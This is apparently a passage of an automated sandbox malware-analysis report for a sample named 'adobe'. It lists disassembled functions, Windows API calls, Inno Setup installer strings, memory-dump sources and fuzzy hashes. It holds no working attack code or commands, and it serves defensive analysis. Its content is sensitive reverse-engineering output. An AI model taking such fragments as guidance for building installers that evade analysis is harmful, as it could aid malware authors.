                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00481B1C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetForegroundWindow.USER32(00000000,00481CA6,?,00000000,00481CE7,?,?,00000001,?,00000000,00000000,00000000,?,0046B0C9), ref: 00481B55
                                                                                                                                                          • SetActiveWindow.USER32(?,00000000,00481CA6,?,00000000,00481CE7,?,?,00000001,?,00000000,00000000,00000000,?,0046B0C9), ref: 00481B67
                                                                                                                                                          Strings
                                                                                                                                                          • Will not restart Windows automatically., xrefs: 00481C86
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Window$ActiveForeground
                                                                                                                                                          • String ID: Will not restart Windows automatically.
                                                                                                                                                          • API String ID: 307657957-4169339592
                                                                                                                                                          • Opcode ID: 340b31c50f7ea1cca09d8bb089bde520bea5fae951facb36814384a506b2de65
                                                                                                                                                          • Instruction ID: 3c2f546218ed638d6c0bffff214a58deef3f88b70f64df96d283108febfe91f1
                                                                                                                                                          • Opcode Fuzzy Hash: 340b31c50f7ea1cca09d8bb089bde520bea5fae951facb36814384a506b2de65
                                                                                                                                                          • Instruction Fuzzy Hash: AC410430244240AED721FB65ED05B6E7BACE716744F144C77E880573B2E77C6806AB5E
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00424950 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetCursorPos.USER32(?), ref: 00424975
                                                                                                                                                          • WaitMessage.USER32(00000000,00424A69,?,?,?,?), ref: 00424A49
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CursorMessageWait
                                                                                                                                                          • String ID: /sI
                                                                                                                                                          • API String ID: 4021538199-3342994382
                                                                                                                                                          • Opcode ID: 905af7f5c58c9462d5240183e36bf06d70efece05efe40a48100f8035784c986
                                                                                                                                                          • Instruction ID: 850bb8641a739d3fa0e3e078eaa16554ae15adb015fc2a4b55b093a82efb48cd
                                                                                                                                                          • Opcode Fuzzy Hash: 905af7f5c58c9462d5240183e36bf06d70efece05efe40a48100f8035784c986
                                                                                                                                                          • Instruction Fuzzy Hash: DA31C3B17002249BCB11EF79D4817AFB7A5EFC4304F9545ABE8049B386D7789D80CA9D
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00477AB4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 86registryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,[!H,?,00000001,?,?,0048215B,?,00000001,00000000), ref: 0042DD60
                                                                                                                                                          • RegCloseKey.ADVAPI32(?,00477B9A,?,?,00000001,00000000,00000000,00477BB5), ref: 00477B83
                                                                                                                                                          Strings
                                                                                                                                                          • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00477B0E
                                                                                                                                                          • %s\%s_is1, xrefs: 00477B2C
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseOpen
                                                                                                                                                          • String ID: %s\%s_is1$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                                                                                          • API String ID: 47109696-1598650737
                                                                                                                                                          • Opcode ID: f07031d9b840cf403d64a87c8ed23e227c3039c30c54fd167b70acffae6f136e
                                                                                                                                                          • Instruction ID: 45934157c02c0c496e244a65e612b419ef8ac41f5fcdc24e779c94ba4387b6af
                                                                                                                                                          • Opcode Fuzzy Hash: f07031d9b840cf403d64a87c8ed23e227c3039c30c54fd167b70acffae6f136e
                                                                                                                                                          • Instruction Fuzzy Hash: 83215574B04604AFDB01DFA9CC51ADEBBE8EB49704F90847AE804E7391D7786E01CB69
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0046BD90 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 86COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to proceed to next wizard page; aborting., xrefs: 0046BE9C
                                                                                                                                                          • Failed to proceed to next wizard page; showing wizard., xrefs: 0046BEB0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Failed to proceed to next wizard page; aborting.$Failed to proceed to next wizard page; showing wizard.
                                                                                                                                                          • API String ID: 0-1974262853
                                                                                                                                                          • Opcode ID: 5dc44d02648091a3d8a5c75f99e041105ecf733eeb8d95a73b78758489fad9c1
                                                                                                                                                          • Instruction ID: 49aa560ffa09cfd52454d09d180e6a2672ed2ce8b76d71ce0c2e5ac3cdd5c4fd
                                                                                                                                                          • Opcode Fuzzy Hash: 5dc44d02648091a3d8a5c75f99e041105ecf733eeb8d95a73b78758489fad9c1
                                                                                                                                                          • Instruction Fuzzy Hash: 963192306082049FD711DB69D985BD977F5EB05314F5900BBF504DB3A2D7796E80CB89
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0044F998 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 78windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SendMessageA.USER32(00000000,0000044B,00000000,?), ref: 0044FA2D
                                                                                                                                                          • ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 0044FA5E
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ExecuteMessageSendShell
                                                                                                                                                          • String ID: open
                                                                                                                                                          • API String ID: 812272486-2758837156
                                                                                                                                                          • Opcode ID: 19d38553df1093e21c3c422bb3cdf04df903a53ff10fe20460ad4336edb0aeee
                                                                                                                                                          • Instruction ID: 6bca1b6fab24ab3242c773a662d76c02cb62ab3d7fac9f31e1195573cc844b5d
                                                                                                                                                          • Opcode Fuzzy Hash: 19d38553df1093e21c3c422bb3cdf04df903a53ff10fe20460ad4336edb0aeee
                                                                                                                                                          • Instruction Fuzzy Hash: FB212E71E00204AFEB00DF69C881A9EB7F8EB44704F60857AB405F7391D6789A468B58
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 004547BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • ShellExecuteEx.SHELL32(0000003C), ref: 00454858
                                                                                                                                                          • GetLastError.KERNEL32(0000003C,00000000,004548A1,?,?,00000001,00000001), ref: 00454869
                                                                                                                                                            • Part of subcall function 0042D890: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8A3
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: DirectoryErrorExecuteLastShellSystem
                                                                                                                                                          • String ID: <
                                                                                                                                                          • API String ID: 893404051-4251816714
                                                                                                                                                          • Opcode ID: 6b19e8113a50972803015087762972cb6966f8d2ae8e68ed7e70ad69a14f5c8b
                                                                                                                                                          • Instruction ID: 9c2ad5da6bcfda7e7c126e73bbb5a2ea45b70f831c3532c714208d446c35f548
                                                                                                                                                          • Opcode Fuzzy Hash: 6b19e8113a50972803015087762972cb6966f8d2ae8e68ed7e70ad69a14f5c8b
                                                                                                                                                          • Instruction Fuzzy Hash: FF21A574A002499FDB00EF65C88269E7BECEF44359F50003AF844E7381D7789D49CB98
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00402584 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • RtlEnterCriticalSection.KERNEL32(0049A420,00000000,)), ref: 004025C7
                                                                                                                                                          • RtlLeaveCriticalSection.KERNEL32(0049A420,0040263D), ref: 00402630
                                                                                                                                                            • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049A420,00000000,00401A82,?,?,0040222E,02399EC4,000030C8,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                                                                                            • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049A420,0049A420,00000000,00401A82,?,?,0040222E,02399EC4,000030C8,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                                                                                            • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049A420,00000000,00401A82,?,?,0040222E,02399EC4,000030C8,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                                                                                            • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049A420,00401A89,00000000,00401A82,?,?,0040222E,02399EC4,000030C8,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                                                                                                          • String ID: )
                                                                                                                                                          • API String ID: 2227675388-1084416617
                                                                                                                                                          • Opcode ID: 3f1f852e20762185401cba0ba12560d65db98eef0cfc92f8ffba015679676d3b
                                                                                                                                                          • Instruction ID: e822125da835f5420473686c3c07f3a27ad935215509521471bf00a9407fd077
                                                                                                                                                          • Opcode Fuzzy Hash: 3f1f852e20762185401cba0ba12560d65db98eef0cfc92f8ffba015679676d3b
                                                                                                                                                          • Instruction Fuzzy Hash: 2311EF317042046EEB25AF799E1A62A6AD497D575CB24487BF804F32D2D9FD8C0282AD
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0049518E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 004951C9
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Window
                                                                                                                                                          • String ID: /INITPROCWND=$%x $@
                                                                                                                                                          • API String ID: 2353593579-4169826103
                                                                                                                                                          • Opcode ID: d1053a672179ff3583de3c7baa2822a5df7e43495b3a7d26068aec598c4a0bc3
                                                                                                                                                          • Instruction ID: 9aa7367fdd5c7212477ef5f2c1fb1af8b7d2e13723dbac355fa9f8943d192997
                                                                                                                                                          • Opcode Fuzzy Hash: d1053a672179ff3583de3c7baa2822a5df7e43495b3a7d26068aec598c4a0bc3
                                                                                                                                                          • Instruction Fuzzy Hash: 2F11B731A086088FDB02DBA4EC52BAEBFE8EB49314F60447BE504E7291D77C99058B58
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00446C68 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                                                                                            • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00446D1A
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: String$AllocByteCharFreeMultiWide
                                                                                                                                                          • String ID: NIL Interface Exception$Unknown Method
                                                                                                                                                          • API String ID: 3952431833-1023667238
                                                                                                                                                          • Opcode ID: c57f3d86235feb565d953f7b33e9ce0aeb0c4074c408860b6886a41cd5ab8bd7
                                                                                                                                                          • Instruction ID: bb0b80e2a380756916404604f3e22b1e01578a82bc6816b9b9cc7d380a4acf04
                                                                                                                                                          • Opcode Fuzzy Hash: c57f3d86235feb565d953f7b33e9ce0aeb0c4074c408860b6886a41cd5ab8bd7
                                                                                                                                                          • Instruction Fuzzy Hash: D811D671B042089FEB04DFA59D41AAEBBACEB49304F52003EF500E7281DA799D04C62E
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00494A00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59processCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00494AC8,?,00494ABC,00000000,00494AA3), ref: 00494A6E
                                                                                                                                                          • CloseHandle.KERNEL32(00494B08,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00494AC8,?,00494ABC,00000000), ref: 00494A85
                                                                                                                                                            • Part of subcall function 00494958: GetLastError.KERNEL32(00000000,004949F0,?,?,?,?), ref: 0049497C
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseCreateErrorHandleLastProcess
                                                                                                                                                          • String ID: D
                                                                                                                                                          • API String ID: 3798668922-2746444292
                                                                                                                                                          • Opcode ID: 1da2f313038589c7262435e0a7452cd7b059717ed73d4c479575660809c3100c
                                                                                                                                                          • Instruction ID: 80fb1cf359d0b2f5838fc37b3898d8fc4d4ed0433fb5d18bfd797e21ae142335
                                                                                                                                                          • Opcode Fuzzy Hash: 1da2f313038589c7262435e0a7452cd7b059717ed73d4c479575660809c3100c
                                                                                                                                                          • Instruction Fuzzy Hash: 9A015EB1644248AFDB00DBA1CC52E9FBBACEF88715F51003AB904E72D1D6785E05866C
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0042DC8C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56registryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,Inno Setup: No Icons,00000000,00000000,00000000,00000000), ref: 0042DCA0
                                                                                                                                                          • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,Inno Setup: No Icons,00000000,00000000,00000000), ref: 0042DCE0
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Value$EnumQuery
                                                                                                                                                          • String ID: Inno Setup: No Icons
                                                                                                                                                          • API String ID: 1576479698-2016326496
                                                                                                                                                          • Opcode ID: a6034a78eb6f28d82538eb73d6f8d4d4ecfcbebd89183b5d88f6193e65cc5de6
                                                                                                                                                          • Instruction ID: 57ddeb90a82b523466695c0d6df077a59cb4ba665f60dcca1a1637bef7e5778e
                                                                                                                                                          • Opcode Fuzzy Hash: a6034a78eb6f28d82538eb73d6f8d4d4ecfcbebd89183b5d88f6193e65cc5de6
                                                                                                                                                          • Instruction Fuzzy Hash: 19012B31B4533069F73085167D01F7B668C8B82B64F64003BF941EA3C0D6D99C04D36E
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00495ED2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 00454B10: GetCurrentProcess.KERNEL32(00000028), ref: 00454B1F
                                                                                                                                                            • Part of subcall function 00454B10: OpenProcessToken.ADVAPI32(00000000,00000028), ref: 00454B25
                                                                                                                                                          • SetForegroundWindow.USER32(?), ref: 00495F04
                                                                                                                                                          Strings
                                                                                                                                                          • Restarting Windows., xrefs: 00495EE1
                                                                                                                                                          • Not restarting Windows because Uninstall is being run from the debugger., xrefs: 00495F2F
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Process$CurrentForegroundOpenTokenWindow
                                                                                                                                                          • String ID: Not restarting Windows because Uninstall is being run from the debugger.$Restarting Windows.
                                                                                                                                                          • API String ID: 3179053593-4147564754
                                                                                                                                                          • Opcode ID: 99583e24e2e9f0d058b79390f435a056594d33341ba4437182f0d97c2d65ddcd
                                                                                                                                                          • Instruction ID: 2fddce828c46425de23b35f9f90fc861464a2ee23dcfefb5497e4e6653f4e5f3
                                                                                                                                                          • Opcode Fuzzy Hash: 99583e24e2e9f0d058b79390f435a056594d33341ba4437182f0d97c2d65ddcd
                                                                                                                                                          • Instruction Fuzzy Hash: 6D01D470614240ABEB12EBA5E902B5C7FE89B4431DF90407BF800AB6D3CA3C9949871D
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 004966CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0047BD14: FreeLibrary.KERNEL32(6FBB0000,004801C6), ref: 0047BD2A
                                                                                                                                                            • Part of subcall function 0047B9E8: GetTickCount.KERNEL32 ref: 0047BA30
                                                                                                                                                            • Part of subcall function 0045658C: SendMessageA.USER32(00000000,00000B01,00000000,00000000), ref: 004565AB
                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000001,?,?,?,?,00497023), ref: 00496721
                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,00497023), ref: 00496727
                                                                                                                                                          Strings
                                                                                                                                                          • Detected restart. Removing temporary directory., xrefs: 004966DB
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
                                                                                                                                                          • String ID: Detected restart. Removing temporary directory.
                                                                                                                                                          • API String ID: 1717587489-3199836293
